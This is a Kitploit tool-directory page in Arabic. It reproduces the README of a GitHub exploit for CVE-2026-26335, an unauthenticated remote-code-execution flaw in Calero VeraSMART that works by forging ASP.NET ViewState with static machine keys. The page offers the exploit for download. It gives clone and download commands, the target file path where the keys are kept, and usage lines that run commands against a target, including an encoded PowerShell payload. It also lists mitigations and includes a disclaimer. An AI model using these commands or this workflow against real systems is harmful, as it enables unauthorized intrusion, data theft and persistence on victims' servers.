Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — استغلال آلي لثغرة CVE-2026-26335، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة غير مصادق عليها في Calero VeraSMART عبر تزوير ASP.NET ViewState باستخدام مفاتيح جهاز ثابتة. يتضمن اكتشاف نقاط النهاية، وتوليد الحمولة، وتنفيذ الأوامر. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

CVE-2026-26335-Calero-VeraSMART-RCE

استغلال آلي لثغرة CVE-2026-26335، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة غير مصادق عليها في Calero VeraSMART عبر تزوير ASP.NET ViewState باستخدام مفاتيح جهاز ثابتة. يتضمن اكتشاف نقاط النهاية، وتوليد الحمولة، وتنفيذ الأوامر.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد
مشاركة

👤 المؤلف

محمد إدريس بن يامر باحث أمني

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - استغلال RCE عبر ViewState في Calero VeraSMART

CVE Severity CVSS Platform ASP.NET Python License Author


📌 الوصف

CVE‑2026‑26335 هي ثغرة حرجة لتنفيذ الأكواد عن بُعد بدون مصادقة في Calero VeraSMART (قبل إصدار 2022 R1).

يستخدم التطبيق مفاتيح آلة ASP.NET ثابتة ومشفّرة داخل الكود مشتركة بين جميع التثبيتات.
يمكن للمهاجم الذي يمتلك هذه المفاتيح تزوير ViewState خبيث في ASP.NET وتحفيز إلغاء تسلسل من جهة الخادم ← تنفيذ أكواد عن بُعد (RCE).

يقوم هذا الاستغلال بأتمتة:

  • اكتشاف نقطة نهاية ViewState
  • استخراج __VIEWSTATEGENERATOR
  • توليد حمولة ysoserial
  • تسليم ViewState موقّع
  • تنفيذ الأوامر

⚠️ الأثر

  • تنفيذ أكواد عن بُعد بدون مصادقة
  • اختراق مستخدم IIS
  • حركة جانبية داخل النطاق
  • سرقة البيانات
  • استمرارية عبر webshell

🧠 السبب الجذري

CWE‑321 — مفاتيح تشفير مشفّرة داخل الكود

تستخدم تثبيتات VeraSMART نفس machineKey الخاص بـ ASP.NET:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

يمكن لأي مهاجم يمتلك مفاتيح من تثبيت واحد مهاجمة جميع التثبيتات.


🛠 المتطلبات

  • Python 3
  • ysoserial.net
  • مفاتيح آلة VeraSMART
  • وصول شبكي إلى IIS

⚙️ التثبيت

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 الحصول على مفاتيح الآلة

المفاتيح ليست عامة. احصل عليها من الهدف:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

أو عبر ثغرة قراءة الملفات المصاحبة:

CVE‑2026‑26333


🚀 الاستخدام

فحص الثغرة

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

تنفيذ أمر

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

نقطة نهاية محددة

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

تصحيح الأخطاء عبر بروكسي

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 سير الاستغلال

  1. العثور على نقطة نهاية ViewState
  2. استخراج المولّد
  3. توليد حمولة موقّعة
  4. إرسال ViewState مزوّر
  5. إلغاء تسلسل ASP.NET
  6. تنفيذ الأوامر

📊 CVSS

9.8 — حرجة AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 تم اختباره على

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (قبل R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 التخفيف

تم الإصلاح في VeraSMART 2022 R1:

  • مفاتيح آلة فريدة
  • تحصين ViewState
  • تخزين آمن للمفاتيح

حلول بديلة:

  • تدوير machineKey
  • تعطيل ViewState
  • تقييد تعرض IIS
  • قواعد WAF لـ ViewState

📚 المراجع

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ إخلاء مسؤولية

لأغراض تعليمية والاختبار المصرّح به فقط. استخدم فقط على الأنظمة التي تملكها أو لديك إذن بتقييمها.


👤 المؤلف

محمد إدريس بن يامر باحث أمني

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 مخطط الاستغلال

يوضح المخطط التالي سلسلة استغلال CVE‑2026‑26335 في Calero VeraSMART، حيث تسمح مفاتيح آلة ASP.NET الثابتة بتزوير ViewState خبيث يؤدي إلى تنفيذ أكواد عن بُعد.

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
تنزيل الأداة